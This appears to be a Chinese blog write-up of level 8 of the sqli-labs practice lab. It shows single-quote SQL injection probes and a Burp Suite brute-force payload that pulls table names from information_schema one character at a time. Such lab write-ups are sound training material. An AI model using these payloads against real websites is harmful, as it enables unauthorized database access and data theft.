sqllab第八关通关笔记

知识点:

  • 这里感觉是一个单纯的单引号绕过
  • bp爆破配置的条件和第七关一样

首先判断注入类型

构造id=1/0

回显成功

构造id=1'

错误回显,感觉又是一个单引号绕过

构造id=1''

正常回显了,说明不错,就是一个单引号绕过

构造payload:id=1' and 1=1 --+

正常回显,绝杀了

利用数据库名再试一下

构造id=1' and database()='security' --+

成功回显

接下来就是利用bp进行爆破了;设置和上一关一样

构造的payload:id=1%27+and+mid((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27),§1§,1)=%27§e§%27--+

对相关设置进行配置;和第七关一样的爆破配置;最后也是需要进行过滤的;虽然这里的长度是不一样的,但是直接利用过滤和排序获取的信息更加的规整好看

10

相关推荐
AOwhisky7 小时前
Python 学习笔记(第一期与第二期)——基础语法——核心知识点自测与详解
开发语言·笔记·python·学习·云原生·运维开发
泰晶科技8 小时前
【前装供应链实操笔记:车规晶振背后AEC-Q100与Q200的绑定关系】
笔记
神明不懂浪漫9 小时前
【第四章】CSS(二)——文本外观属性与复合选择器
前端·css·经验分享·笔记
栈溢出了11 小时前
Redis 分片集群与哈希槽笔记
java·redis·笔记·spring
我命由我1234512 小时前
复利极简理解
经验分享·笔记·学习·职场和发展·求职招聘·职场发展·学习方法
AOwhisky12 小时前
Python 学习笔记(第三期)——流程控制核心知识点自测与详解
开发语言·笔记·python·学习·云原生·运维开发·流程控制
我命由我1234514 小时前
72 法则极简理解
经验分享·笔记·学习·职场和发展·求职招聘·职场发展·学习方法
xian_wwq15 小时前
【学习笔记】OpenAI 兼容 API 服务化:从协议到 LLM Gateway(19/35)
笔记·学习
醉城夜风~16 小时前
SQL DQL数据查询语言全套学习笔记(基础查询→执行顺序全解析)
笔记·sql·学习
小L~~~17 小时前
MLIR学习笔记
笔记·学习·mlir